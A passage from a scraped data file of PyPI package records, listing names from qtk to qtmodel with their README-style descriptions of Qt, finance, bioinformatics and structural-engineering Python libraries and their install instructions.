res.process(asof_date)tbond = res.object(\"USD.TBond\")print tbond.NPV()The basic idea here is that once you have the data prepared, the `Controller` can be invoked to do the calculations.A few points that are worth noting here.- All the data is textual and rather intuitive. For instance, the couponfrequency is just stated as `Annual` or `Semiannual`. The same is true for a lot of other fields. For dates,the `dateutil` package is used to parse and covers a wide variety of formats.- The `data` is essentially a `list` of `dict` with each `dict` corresponding to a specific `object` as determinedby the value to the key `Template` in each `dict`. Each `object` here has a name as specified by the value of thekey `ObjectId`- One of the values can refer to another object described by a `dict` by using the `reference` syntax. For instance,the first `dict` in the `data` list (with `ObjectId` given as *USD.Zero.Curve* ) variable refers to an interestrate term structure of zero rates. The next object is a discounting bond engine, and require an yield curve asinput for the discount curve. Here the yield curve is refered by using the prefix `->` along with the name of theobject we are referring to.- Here, the `Controller` parses the data, and figures out the dependency and processes the object in the correct orderand fulfills the dependencies behind the scenes.## IntrospectionThere are a few convenience methods that provide help on how to construct the data packet. For example,the `help` method in the template prints out the summary and list of fields on how to constructthe data packet for the template.> T.TS_YIELD_BOND.help()**Description**A template for creating yield curve by stripping bond quotes.**Required Fields**- `Template` [*Template*]: 'TermStructure.Yield.BondCurve'- `InstrumentCollection` [*List*]: Collection of instruments- `AsOfDate` [*Date*]: Reference date or as of date- `Country` [*String*]: Country- `Currency` [*String*]: Currency**Optional Fields**- `ObjectId` [*String*]: A unique name or identifier to refer to this dictionary data- `InterpolationMethod` [*String*]: The interpolation method can be one of the following choices: LinearZero, CubicZero, FlatForward, LinearForward,LogCubicDiscount.- `DiscountBasis` [*DayCount*]: Discount Basis- `SettlementDays` [*Integer*]: Settlement days- `DiscountCalendar` [*Calendar*]: Discount CalendarThe `help` method prints the description in `info` method in Markdown format. While using IPython/Jupyter notebooks, the descriptionprints in a nice looking format. One can start with a sample data packet to fill out the input fields using the `sample_data` method.> T.TS_YIELD_BOND.sample_data(){'AsOfDate': 'Required (Date)','Country': 'Required (String)','Currency': 'Required (String)','DiscountBasis': 'Optional (DayCount)','DiscountCalendar': 'Optional (Calendar)','InstrumentCollection': 'Required (List)','InterpolationMethod': 'Optional (String)','ObjectId': 'Optional (String)','SettlementDays': 'Optional (Integer)','Template': 'TermStructure.Yield.BondCurve'}## InstallationYou can install qtk using `pip` or `easy_install`pip install qtkoreasy_install qtk`qtk` has a dependency on `QuantLib-Python` which needs to be installed as well."} +{"package": "qtkanobu", "pacakge-description": "qtkanobuQt port of kanobu"} +{"package": "qtkitty", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtl", "pacakge-description": "pyQTLpyQTL is a python module for analyzing and visualizing quantitative trait loci (QTL) data.InstallYou can install pyQTL using pip:pip3 install qtlor directly from this repository:$ git clone git@github.com:broadinstitute/pyqtl.git\n$ cd pyqtl\n# set up virtual environment and install\n$ virtualenv venv\n$ source venv/bin/activate\n(venv)$ pip install -e ."} +{"package": "qtlab", "pacakge-description": "No description available on PyPI."} +{"package": "qtl-ctp-api", "pacakge-description": "qtl-ctp-apiOnly for Linux.preparesudo locale-gen zh_CN.GBKinstallpip install qtl-ctp-apiversionCTP: v6.7.2"} +{"package": "qt-ledwidget", "pacakge-description": "No description available on PyPI."} +{"package": "qtlib", "pacakge-description": "qtliba open source project for quantitative trading library"} +{"package": "qtl-instrument-book", "pacakge-description": "Quantalon Instrument Book"} +{"package": "qtl-kit", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtl-metrics", "pacakge-description": "Quantalon MetricsQuickStartimport yfinance as yf\nfrom qtl_metrics import Metrics\n\naapl = yf.Ticker(\"AAPL\")\ndata = aapl.history()\nprices = data['Close']\nmetrics = Metrics(prices)\n\nprint(metrics.stats)"} +{"package": "qtl-models", "pacakge-description": "No description available on PyPI."} +{"package": "qt-log", "pacakge-description": "QtLogCustom Python Log with colored message display for Maya/Houdini/NukePySide2/Python3 - Maya +2022, Houdini +19, Nuke +13Message Levelslog=get_stream_logger('my_log')log.info('test info')# whitelog.warning('test warning')# orangelog.error('test error')# redlog.critical('test critical')# purplelog.debug('test debug')# yellowlog.ok('test ok')# sky bluelog.file('test file')# super light bluelog.process('test process')# light bluelog.done('test done')# greenlog.hint('hint to the user')# yellowUsage# importsfromqtlog.stream_logimportget_stream_loggerfromqtlog.qt_ui_loggerimportQtUILogger# get loggerslog=get_stream_logger('MyToolLog')log_ext=get_stream_logger('ExternalLog')# create the log widgetself.loggers=QtUILogger(parent=self,layout_widget=self.ui.log_layout,loggers=[log,log_ext])# sent messages are displayed in color on the ui widget and mayalog.hint('Message')"} +{"package": "qtlsearch", "pacakge-description": "No description available on PyPI."} +{"package": "qtl-trading-calendar", "pacakge-description": "Quantalon Trading Calendar\u56fd\u5185\u5e02\u573a\u4ea4\u6613\u65e5\u5386Quick Start\u5b89\u88c5$ pip install qtl-trading-calendarExpiration Date2024-12-31Testspython -m unittest .\\tests\\test.pyorpython -m unittest discover -s tests"} +{"package": "qtl-xtp-api", "pacakge-description": "qtl-xtp-apiOnly for Linuxinstallpip install qtl-xtp-apiversionXTP: 2.2.35.1"} +{"package": "qtm", "pacakge-description": "Future versions of this package will go under the name \u201cqtm-rt\u201d."} +{"package": "qtmacs", "pacakge-description": "Qtmacs is an Emacs inspired macro framework for Qt. It consists of\ntask related applets and widget specific macros.Applets are basically plain windows that can house arbitrary\ncode and widgets. Within Qtmacs, they provide the functionailty to\neg. edit text, view a PDF file, or browse the web.Macros, on the other hand, govern the behaviour of individual widgets\nin response to keyboard input. They are are applicable to any Qt based\nwidget.Both, applets and macros, are supplied via Python modules and can be\nchanged during runtime to customise the functionality and behaviour of\nQtmacs as required.SOURCE CODEThe source code is hosted on Github:https://github.com/qtmacsdev/qtmacsREQUIREMENTSPython 3.xPyQt4Older versions of PyQt4 may work as well but have not been tested.INSTALLATIONTo install Qtmacs on Windows, or use package managers on Linux based\ndistributions, please refer to theinstallation guide.To try out the source code directly use:gitclonehttps://github.com/qtmacsdev/qtmacs.gitcdqtmacs/bin./qtmacsDOCUMENTATIONThe full documentation, including screenshots, is available athttp://qtmacsdev.github.com/qtmacs/titlepage.htmlThere is also a discussion group athttps://groups.google.com/forum/?fromgroups#!forum/qtmacsLICENSEQtmacs is licensed under the terms of the GPL."} +{"package": "qt-material", "pacakge-description": "Qt-MaterialThis is another stylesheet forPySide6,PySide2,PyQt5andPyQt6, which looks like Material Design (close enough).There is some custom dark themes:And light:NavigationInstallUsageThemesCustom colorsUsageLight themesEnviron variablesAlternative QPushButtons and custom fontsCustom stylesheetsRun examplesNew themesChange theme in runtimeExport themeDensity scaleTroubleshootsInstallpipinstallqt-materialUsageimportsysfromPySide6importQtWidgets# from PySide2 import QtWidgets# from PyQt5 import QtWidgetsfromqt_materialimportapply_stylesheet# create the application and the main windowapp=QtWidgets.QApplication(sys.argv)window=QtWidgets.QMainWindow()# setup stylesheetapply_stylesheet(app,theme='dark_teal.xml')# runwindow.show()app.exec_()Themesfromqt_materialimportlist_themeslist_themes()WARNING:root:qt_material must be imported after PySide or PyQt!\n\n\n\n\n\n['dark_amber.xml',\n 'dark_blue.xml',\n 'dark_cyan.xml',\n 'dark_lightgreen.xml',\n 'dark_pink.xml',\n 'dark_purple.xml',\n 'dark_red.xml',\n 'dark_teal.xml',\n 'dark_yellow.xml',\n 'light_amber.xml',\n 'light_blue.xml',\n 'light_cyan.xml',\n 'light_cyan_500.xml',\n 'light_lightgreen.xml',\n 'light_pink.xml',\n 'light_purple.xml',\n 'light_red.xml',\n 'light_teal.xml',\n 'light_yellow.xml']Custom colorsColor Toolis the best way to generate new themes, just choose colors and export asAndroid XML, the theme file must look like:#00e5ff#6effff#f5f5f5#ffffff#e6e6e6#000000#000000Save it asmy_theme.xmlor similar and apply the style sheet from Python.apply_stylesheet(app,theme='dark_teal.xml')Light themesLight themes will need to addinvert_secondaryargument asTrue.apply_stylesheet(app,theme='light_red.xml',invert_secondary=True)Environ variablesThere is a environ variables related to the current theme used, these variables are forconsult purpose only.Environ variableDescriptionExampleQTMATERIAL_PRIMARYCOLORPrimary color#2979ffQTMATERIAL_PRIMARYLIGHTCOLORA bright version of the primary color#75a7ffQTMATERIAL_SECONDARYCOLORSecondary color#f5f5f5QTMATERIAL_SECONDARYLIGHTCOLORA bright version of the secondary color#ffffffQTMATERIAL_SECONDARYDARKCOLORA dark version of the primary color#e6e6e6QTMATERIAL_PRIMARYTEXTCOLORColor for text over primary background#000000QTMATERIAL_SECONDARYTEXTCOLORColor for text over secondary background#000000QTMATERIAL_THEMEName of theme usedlight_blue.xmlAlternative QPushButtons and custom fontsThere is anextraargument for accent colors and custom fonts.extra={# Button colors'danger':'#dc3545','warning':'#ffc107','success':'#17a2b8',# Font'font_family':'Roboto',}apply_stylesheet(app,'light_cyan.xml',invert_secondary=True,extra=extra)The accent colors are applied toQPushButtonwith the correspondingclassproperty:pushButton_danger.setProperty('class','danger')pushButton_warning.setProperty('class','warning')pushButton_success.setProperty('class','success')Custom stylesheetsCustom changes can be performed by overwriting the stylesheets, for example:QPushButton{{color:{QTMATERIAL_SECONDARYCOLOR};text-transform:none;background-color:{QTMATERIAL_PRIMARYCOLOR};}}.big_button{{height:64px;}}Then, the current stylesheet can be extended just with:apply_stylesheet(app,theme='light_blue.xml',css_file='custom.css')The stylesheet can also be changed on runtime by:stylesheet=app.styleSheet()withopen('custom.css')asfile:app.setStyleSheet(stylesheet+file.read().format(**os.environ))And the class style can be applied with thesetPropertymethod:self.main.pushButton.setProperty('class','big_button')Run examplesA window with almost all widgets (see the previous screenshots) are available to test all themes andcreate new ones.gitclonehttps://github.com/UN-GCPDS/qt-material.gitcdqt-materialpythonsetup.pyinstallcdexamples/full_featurespythonmain.py--pyside6New themesDo you have a custom theme? it looks good? create apull requestinthemes folderand share it with all users.Change theme in runtimeThere is aqt_material.QtStyleToolsclass that must be inherited along toQMainWindowfor change themes in runtime using theapply_stylesheet()method.classRuntimeStylesheets(QMainWindow,QtStyleTools):def__init__(self):super().__init__()self.main=QUiLoader().load('main_window.ui',self)self.apply_stylesheet(self.main,'dark_teal.xml')# self.apply_stylesheet(self.main, 'light_red.xml')# self.apply_stylesheet(self.main, 'light_blue.xml')Integrate stylesheets in a menuA customstylesheets menucan be added to a project for switching across all default available themes.classRuntimeStylesheets(QMainWindow,QtStyleTools):def__init__(self):super().__init__()self.main=QUiLoader().load('main_window.ui',self)self.add_menu_theme(self.main,self.main.menuStyles)Create new themesA simple interface is available to modify a theme in runtime, this feature can be used to create a new theme, the theme file is created in the main directory asmy_theme.xmlclassRuntimeStylesheets(QMainWindow,QtStyleTools):def__init__(self):super().__init__()self.main=QUiLoader().load('main_window.ui',self)self.show_dock_theme(self.main)A full set of examples are available in theexmaples directoryExport themeThis feature able to useqt-materialthemes intoQtimplementations using only local files.fromqt_materialimportexport_themeextra={# Button colors'danger':'#dc3545','warning':'#ffc107','success':'#17a2b8',# Font'font_family':'monoespace','font_size':'13px','line_height':'13px',# Density Scale'density_scale':'0',# environ'pyside6':True,'linux':True,}export_theme(theme='dark_teal.xml',qss='dark_teal.qss',rcc='resources.rcc',output='theme',prefix='icon:/',invert_secondary=False,extra=extra,)This script will generate bothdark_teal.qssandresources.rccand a folder with all theme icons calledtheme.The files generated can be integrated into aPySide6application just with:importsysfromPySide6importQtWidgetsfromPySide6.QtCoreimportQDirfrom__feature__importsnake_case,true_property# Create applicationapp=QtWidgets.QApplication(sys.argv)# Load styleswithopen('dark_teal.qss','r')asfile:app.style_sheet=file.read()# Load iconsQDir.add_search_path('icon','theme')# Appwindow=QtWidgets.QMainWindow()checkbox=QtWidgets.QCheckBox(window)checkbox.text='CheckBox'window.show()app.exec()This files can also be used into nonPythonenvirons likeC++.Density scaleTheextraarguments also include an option to set thedensity scale, by default is0.extra={# Density Scale'density_scale':'-2',}apply_stylesheet(app,'default',invert_secondary=False,extra=extra)TroubleshootsQMenuQMenuhas multiple rendering for each Qt backend, and for each operating system. Even can be related with the style, likefusion. Then, theextraargument also supportsQMenuparameters to configure this widgest for specific combinations. This options are not affected bydensity scale.extra['QMenu']={'height':50,'padding':'50px 50px 50px 50px',# top, right, bottom, left}"} +{"package": "qt-material-stubs", "pacakge-description": "qt_material-stubsInstallationpip install qt_material-stubsStyle GuidelinesFollow the same style guidelines astypeshed."} +{"package": "qtme", "pacakge-description": "Copyright (c) 2023 J\u00e9r\u00e9mie DECOCK (www.jdhp.org)Web site:http://www.jdhp.org/software_en.html#qtmeOnline documentation:https://jdhp.gitlab.io/qtmeExamples:https://jdhp.gitlab.io/qtme/gallery/Notebooks:https://gitlab.com/jdhp/qt-multimedia-editor-notebooksSource code:https://gitlab.com/jdhp/qt-multimedia-editorIssue tracker:https://gitlab.com/jdhp/qt-multimedia-editor/issuesPytest code coverage:https://jdhp.gitlab.io/qtme/htmlcov/index.htmlQt Multimedia Editor on PyPI:https://pypi.org/project/qtmeQt Multimedia Editor on Anaconda Cloud:https://anaconda.org/jdhp/qtmeDescriptionMultimedia editor for PyQt/PySideNote:This project is still in beta stage, so the API is not finalized yet.DependenciesC.f. requirements.txtInstallationPosix (Linux, MacOSX, WSL, \u2026)From the Qt Multimedia Editor source code:conda deactivate # Only if you use Anaconda...\npython3 -m venv env\nsource env/bin/activate\npython3 -m pip install --upgrade pip\npython3 -m pip install -r requirements.txt\npython3 setup.py developWindowsFrom the Qt Multimedia Editor source code:conda deactivate # Only if you use Anaconda...\npython3 -m venv env\nenv\\Scripts\\activate.bat\npython3 -m pip install --upgrade pip\npython3 -m pip install -r requirements.txt\npython3 setup.py developDocumentationOnline documentation:https://jdhp.gitlab.io/qtmeAPI documentation:https://jdhp.gitlab.io/qtme/api.htmlExample usageExamples:https://jdhp.gitlab.io/qtme/gallery/Build and run the Python Docker imageBuild the docker imageFrom the Qt Multimedia Editor source code:docker build -t qtme:latest .Run unit tests from the docker containerFrom the Qt Multimedia Editor source code:docker run qtme pytestRun an example from the docker containerFrom the Qt Multimedia Editor source code:docker run qtme python3 /app/examples/hello.pyBug reportsTo search for bugs or report them, please use the Qt Multimedia Editor Bug Tracker at:https://gitlab.com/jdhp/qt-multimedia-editor/issuesLicenseThis project is provided under the terms and conditions of theMIT License."} +{"package": "qt-messenger-client", "pacakge-description": "No description available on PyPI."} +{"package": "qt-messenger-server", "pacakge-description": "No description available on PyPI."} +{"package": "qtmetabolabpy", "pacakge-description": "Python package to process 1D and 2D NMR spectroscopic data for metabolomics and tracer based metabolism analysisDocumentation:https://ludwigc.github.io/metabolabpySource:https://github.com/ludwigc/MetaboLabPyBug reports:https://github.com/ludwigc/MetaboLabPy/issuesInstallationSee theInstallation pageof\ntheonline documentation.Command line$ metabolabpy --helpBugsPlease report any bugs that you findhere.\nOr fork the repository onGitHuband create a pull request (PR). We welcome all contributions, and we\nwill help you to make the PR if you are new togit.Developers & ContributorsChristian Ludwig (C.Ludwig@bham.ac.uk) -University of Birmingham (UK)LicenseReleased under the GNU General Public License v3.0 (seeLICENSE file)"} +{"package": "qtmimport", "pacakge-description": "QTMimportThis small module opens data files generated by the QTMtoolbox (.csv format) and parses the data into a single object (class).\nEach variable that was measured is an attribute of this class, and contains the header name, data, etc.DependenciesThis module usesnumpy.UsageTo import the module, usefrom qtmimport import qtmimportThen, to parse data, usedata_object = qtmimport.parse_data(filename)Thedata_objectwill contain data in the following form:Data structure:\n \n list QTMdata:\n |\n |--> class \"variable\"\n |\n |--> index (must be unique!)\n |\n |--> header name (not unique, e.g. for when \n | you both sweep and read a variable)\n |\n |--> data array \n\t\t\t\t|--> variable type (s = SETpoint, g = GET value (measured value))"} +{"package": "qtML", "pacakge-description": "\u5a34\u5b2d\u762f"} +{"package": "qtmodel", "pacakge-description": "\u521d\u59cb\u5316\u6a21\u578binitial\u521d\u59cb\u5316\u6a21\u578bReturns: \u65e0\u8282\u70b9\u5355\u5143\u64cd\u4f5cadd_structure_group\u6dfb\u52a0\u7ed3\u6784\u7ec4Args:name: \u7ed3\u6784\u7ec4\u540dindex: \u7ed3\u6784\u7ec4\u7f16\u53f7(\u975e\u5fc5\u987b\u53c2\u6570)\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b\u5f53\u524d\u7f16\u53f7Returns: \u65e0remove_structure_group\u53ef\u6839\u636e\u7ed3\u6784\u4e0e\u7ec4\u540d\u6216\u7ed3\u6784\u7ec4\u7f16\u53f7\u5220\u9664\u7ed3\u6784\u7ec4\uff0c\u5f53\u7ec4\u540d\u548c\u7ec4\u7f16\u53f7\u5747\u4e3a\u9ed8\u8ba4\u5219\u5220\u9664\u6240\u6709\u7ed3\u6784\u7ec4Args:name:\u7ed3\u6784\u7ec4\u540d\u79f0index:\u7ed3\u6784\u7ec4\u7f16\u53f7Returns: \u65e0add_structure_to_group\u4e3a\u7ed3\u6784\u7ec4\u6dfb\u52a0\u8282\u70b9\u548c/\u6216\u5355\u5143Args:name: \u7ed3\u6784\u7ec4\u540dnode_ids: \u8282\u70b9\u7f16\u53f7\u5217\u8868(\u53ef\u9009\u53c2\u6570)element_ids: \u5355\u5143\u7f16\u53f7\u5217\u8868(\u53ef\u9009\u53c2\u6570)Returns: \u65e0remove_structure_in_group\u4e3a\u7ed3\u6784\u7ec4\u5220\u9664\u8282\u70b9\u548c/\u6216\u5355\u5143Args:name: \u7ed3\u6784\u7ec4\u540dnode_ids: \u8282\u70b9\u7f16\u53f7\u5217\u8868(\u53ef\u9009\u53c2\u6570)element_ids: \u5355\u5143\u7f16\u53f7\u5217\u8868(\u53ef\u9009\u53c2\u6570)Returns: \u65e0add_node\u6839\u636e\u5750\u6807\u4fe1\u606f\u548c\u8282\u70b9\u7f16\u53f7\u6dfb\u52a0\u8282\u70b9\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b\u7f16\u53f7Args:x: \u8282\u70b9\u5750\u6807xy: \u8282\u70b9\u5750\u6807yz: \u8282\u70b9\u5750\u6807zindex: \u8282\u70b9\u7f16\u53f7\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b\u7f16\u53f7 (\u53ef\u9009\u53c2\u6570)Returns:\u65e0add_nodes\u6dfb\u52a0\u591a\u4e2a\u8282\u70b9\uff0c\u53ef\u4ee5\u9009\u62e9\u6307\u5b9a\u8282\u70b9\u7f16\u53f7Args:node_list:\u8282\u70b9\u5750\u6807\u4fe1\u606f [[x1,y1,z1],...]\u6216 [[id1,x1,y1,z1]...]Returns: \u65e0remove_node\u5220\u9664\u6307\u5b9a\u8282\u70b9Args:index:\u8282\u70b9\u7f16\u53f7Returns: \u65e0add_element\u6839\u636e\u5355\u5143\u7f16\u53f7\u548c\u5355\u5143\u7c7b\u578b\u6dfb\u52a0\u5355\u5143Args:index:\u5355\u5143\u7f16\u53f7ele_type:\u5355\u5143\u7c7b\u578b 1-\u6881 2-\u7d22 3-\u6746 4-\u677fnode_ids:\u5355\u5143\u5bf9\u5e94\u7684\u8282\u70b9\u5217\u8868 [i,j] \u6216 [i,j,k,l]beta_angle:\u8d1d\u5854\u89d2mat_id:\u6750\u6599\u7f16\u53f7sec_id:\u622a\u9762\u7f16\u53f7Returns: \u65e0remove_element\u5220\u9664\u6307\u5b9a\u7f16\u53f7\u7684\u5355\u5143Args:index: \u5355\u5143\u7f16\u53f7,\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u5355\u5143Returns: \u65e0\u6750\u6599\u64cd\u4f5cadd_material\u6dfb\u52a0\u6750\u6599Args:index:\u6750\u6599\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)name:\u6750\u6599\u540d\u79f0material_type: \u6750\u6599\u7c7b\u578bstandard_name:\u89c4\u8303\u540d\u79f0database:\u6570\u636e\u5e93construct_factor:\u6784\u9020\u7cfb\u6570modified:\u662f\u5426\u4fee\u6539\u9ed8\u8ba4\u6750\u6599\u53c2\u6570,\u9ed8\u8ba4\u4e0d\u4fee\u6539 (\u53ef\u9009\u53c2\u6570)modify_info:\u6750\u6599\u53c2\u6570\u5217\u8868[\u5f39\u6027\u6a21\u91cf,\u5bb9\u91cd,\u6cca\u677e\u6bd4,\u70ed\u81a8\u80c0\u7cfb\u6570] (\u53ef\u9009\u53c2\u6570)Returns: \u65e0add_time_material\u6dfb\u52a0\u6536\u7f29\u5f90\u53d8\u6750\u6599Args:index: \u6536\u7f29\u5f90\u53d8\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)name: \u6536\u7f29\u5f90\u53d8\u540dcode_index: \u6536\u7f29\u5f90\u53d8\u89c4\u8303\u7d22\u5f15time_parameter: \u5bf9\u5e94\u89c4\u8303\u7684\u6536\u7f29\u5f90\u53d8\u53c2\u6570\u5217\u8868,\u9ed8\u8ba4\u4e0d\u6539\u53d8\u89c4\u8303\u4e2d\u4fe1\u606f (\u53ef\u9009\u53c2\u6570)Returns:\u65e0update_material_creep\u5c06\u6536\u7f29\u5f90\u53d8\u53c2\u6570\u8fde\u63a5\u5230\u6750\u6599Args:index: \u6750\u6599\u7f16\u53f7creep_id: \u6536\u7f29\u5f90\u53d8\u7f16\u53f7f_cuk: \u6750\u6599\u6807\u51c6\u6297\u538b\u5f3a\u5ea6,\u4ec5\u81ea\u5b9a\u4e49\u6750\u6599\u662f\u9700\u8981\u8f93\u5165Returns: \u65e0remove_material\u5220\u9664\u6307\u5b9a\u6750\u6599Args:index:\u6750\u6599\u7f16\u53f7\uff0c\u9ed8\u8ba4\u5220\u9664\u6240\u6709\u6750\u6599Returns: \u65e0\u622a\u9762\u548c\u677f\u539a\u64cd\u4f5cadd_section\u6dfb\u52a0\u622a\u9762\u4fe1\u606fArgs:index: \u622a\u9762\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522bname:\u622a\u9762\u540d\u79f0section_type:\u622a\u9762\u7c7b\u578bsection_info:\u622a\u9762\u4fe1\u606f (\u5fc5\u8981\u53c2\u6570)bias_type:\u504f\u5fc3\u7c7b\u578bcenter_type:\u4e2d\u5fc3\u7c7b\u578bshear_consider:\u8003\u8651\u526a\u5207bias_point:\u81ea\u5b9a\u4e49\u504f\u5fc3\u70b9(\u4ec5\u81ea\u5b9a\u4e49\u7c7b\u578b\u504f\u5fc3\u9700\u8981)Returns: \u65e0add_single_box\u6dfb\u52a0\u5355\u9879\u591a\u5ba4\u6df7\u51dd\u571f\u622a\u9762Args:index:\u622a\u9762\u7f16\u53f7\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522bname:\u622a\u9762\u540d\u79f0n:\u7bb1\u5ba4\u6570\u91cfh:\u622a\u9762\u9ad8\u5ea6section_info:\u622a\u9762\u4fe1\u606fcharm_info:\u622a\u9762\u5012\u89d2section_info2:\u53f3\u534a\u5ba4\u622a\u9762\u4fe1\u606fcharm_info2:\u53f3\u534a\u5ba4\u622a\u9762\u5012\u89d2bias_type:\u504f\u5fc3\u7c7b\u578bcenter_type:\u4e2d\u5fc3\u7c7b\u578bshear_consider:\u8003\u8651\u526a\u5207bias_point:\u81ea\u5b9a\u4e49\u504f\u5fc3\u70b9(\u4ec5\u81ea\u5b9a\u4e49\u7c7b\u578b\u504f\u5fc3\u9700\u8981)Returns: \u65e0add_steel_section\u6dfb\u52a0\u94a2\u6881\u622a\u9762,\u5305\u62ec\u53c2\u6570\u578b\u94a2\u6881\u622a\u9762\u548c\u81ea\u5b9a\u4e49\u5e26\u808b\u94a2\u6881\u622a\u9762Args:index:name:section_type:\u622a\u9762\u7c7b\u578bsection_info:\u622a\u9762\u4fe1\u606frib_info:\u808b\u677f\u4fe1\u606frib_place:\u808b\u677f\u4f4d\u7f6ebias_type:\u504f\u5fc3\u7c7b\u578bcenter_type:\u4e2d\u5fc3\u7c7b\u578bshear_consider:\u8003\u8651\u526a\u5207bias_point:\u81ea\u5b9a\u4e49\u504f\u5fc3\u70b9(\u4ec5\u81ea\u5b9a\u4e49\u7c7b\u578b\u504f\u5fc3\u9700\u8981)Returns: \u65e0add_user_section\u6dfb\u52a0\u81ea\u5b9a\u4e49\u622a\u9762,\u76ee\u524d\u4ec5\u652f\u6301\u7279\u6027\u622a\u9762Args:index:\u622a\u9762\u7f16\u53f7name:\u622a\u9762\u540d\u79f0section_type:\u622a\u9762\u7c7b\u578bproperty_info:\u622a\u9762\u7279\u6027\u5217\u8868Returns: \u65e0add_tapper_section\u6dfb\u52a0\u53d8\u622a\u9762,\u9700\u5148\u5efa\u7acb\u5355\u4e00\u622a\u9762Args:index:\u622a\u9762\u7f16\u53f7name:\u622a\u9762\u540d\u79f0begin_id:\u622a\u9762\u59cb\u7aef\u7f16\u53f7end_id:\u622a\u9762\u672b\u7aef\u7f16\u53f7vary_info:\u622a\u9762\u53d8\u5316\u4fe1\u606fReturns: \u65e0remove_section\u5220\u9664\u622a\u9762\u4fe1\u606fArgs:index: \u622a\u9762\u7f16\u53f7,\u53c2\u6570\u4e3a\u9ed8\u8ba4\u65f6\u5220\u9664\u5168\u90e8\u622a\u9762Returns: \u65e0add_thickness\u6dfb\u52a0\u677f\u539aArgs:index: \u677f\u539aidname: \u677f\u539a\u540d\u79f0t: \u677f\u539a\u5ea6thick_type: \u677f\u539a\u7c7b\u578b 0-\u666e\u901a\u677f 1-\u52a0\u52b2\u808b\u677fbias_info: \u9ed8\u8ba4\u4e0d\u504f\u5fc3,\u504f\u5fc3\u65f6\u8f93\u5165\u5217\u8868[type,value] type:0-\u539a\u5ea6\u6bd4 1-\u6570\u503crib_pos:\u808b\u677f\u4f4d\u7f6edist_v:\u7eb5\u5411\u622a\u9762\u808b\u677f\u95f4\u8ddddist_l:\u6a2a\u5411\u622a\u9762\u808b\u677f\u95f4\u8dddrib_v:\u7eb5\u5411\u808b\u677f\u4fe1\u606frib_l:\u6a2a\u5411\u808b\u677f\u4fe1\u606fReturns: \u65e0remove_thickness\u5220\u9664\u677f\u539aArgs:index:\u677f\u539a\u7f16\u53f7,\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u677f\u539a\u4fe1\u606fReturns: \u65e0add_tapper_section_group\u6dfb\u52a0\u53d8\u622a\u9762\u7ec4Args:ids:\u53d8\u622a\u9762\u7ec4\u7f16\u53f7name: \u53d8\u622a\u9762\u7ec4\u540dfactor_w: \u5bbd\u5ea6\u65b9\u5411\u53d8\u5316\u9636\u6570 \u7ebf\u6027(1.0) \u975e\u7ebf\u6027(!=1.0)factor_h: \u9ad8\u5ea6\u65b9\u5411\u53d8\u5316\u9636\u6570 \u7ebf\u6027(1.0) \u975e\u7ebf\u6027(!=1.0)ref_w: \u5bbd\u5ea6\u65b9\u5411\u53c2\u8003\u70b9 0-i 1-jref_h: \u9ad8\u5ea6\u65b9\u5411\u53c2\u8003\u70b9 0-i 1-jdis_w: \u5bbd\u5ea6\u65b9\u5411\u95f4\u8ddddis_h: \u9ad8\u5ea6\u65b9\u5411\u95f4\u8dddReturns: \u65e0update_section_bias\u66f4\u65b0\u622a\u9762\u504f\u5fc3Args:index:\u622a\u9762\u7f16\u53f7bias_type:\u504f\u5fc3\u7c7b\u578bcenter_type:\u4e2d\u5fc3\u7c7b\u578bshear_consider:\u8003\u8651\u526a\u5207bias_point:\u81ea\u5b9a\u4e49\u504f\u5fc3\u70b9(\u4ec5\u81ea\u5b9a\u4e49\u7c7b\u578b\u504f\u5fc3\u9700\u8981)Returns: \u65e0\u8fb9\u754c\u64cd\u4f5cadd_boundary_group\u65b0\u5efa\u8fb9\u754c\u7ec4Args:name:\u8fb9\u754c\u7ec4\u540dindex:\u8fb9\u754c\u7ec4\u7f16\u53f7\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b\u5f53\u524d\u7f16\u53f7 (\u53ef\u9009\u53c2\u6570)Returns: \u65e0remove_boundary_group\u6309\u7167\u540d\u79f0\u5220\u9664\u8fb9\u754c\u7ec4Args:name: \u8fb9\u754c\u7ec4\u540d\u79f0\uff0c\u9ed8\u8ba4\u5220\u9664\u6240\u6709\u8fb9\u754c\u7ec4 (\u975e\u5fc5\u987b\u53c2\u6570)Returns: \u65e0remove_boundary\u6839\u636e\u8fb9\u754c\u7ec4\u540d\u79f0\u3001\u8fb9\u754c\u7684\u7c7b\u578b\u548c\u7f16\u53f7\u5220\u9664\u8fb9\u754c\u4fe1\u606f,\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u8fb9\u754c\u4fe1\u606fArgs:group_name: \u8fb9\u754c\u7ec4\u540dboundary_type: \u8fb9\u754c\u7c7b\u578bindex: \u8fb9\u754c\u7f16\u53f7Returns: \u65e0add_general_support\u6dfb\u52a0\u4e00\u822c\u652f\u627fArgs:index:\u8fb9\u754c\u7f16\u53f7node_id:\u8282\u70b9\u7f16\u53f7boundary_info:\u8fb9\u754c\u4fe1\u606f\uff0c\u4f8b\u5982[X,Y,Z,Rx,Ry,Rz] 1-\u56fa\u5b9a 0-\u81ea\u7531group_name:\u8fb9\u754c\u7ec4\u540dReturns: \u65e0add_elastic_support\u6dfb\u52a0\u5f39\u6027\u652f\u627fArgs:index:\u7f16\u53f7node_id:\u8282\u70b9\u7f16\u53f7support_type:\u652f\u627f\u7c7b\u578bboundary_info:\u8fb9\u754c\u4fe1\u606fgroup_name:\u8fb9\u754c\u7ec4Returns: \u65e0add_master_slave_link\u6dfb\u52a0\u4e3b\u4ece\u7ea6\u675fArgs:index:\u7f16\u53f7master_id:\u4e3b\u8282\u70b9\u53f7slave_id:\u4ece\u8282\u70b9\u53f7boundary_info:\u8fb9\u754c\u4fe1\u606fgroup_name:\u8fb9\u754c\u7ec4\u540dReturns: 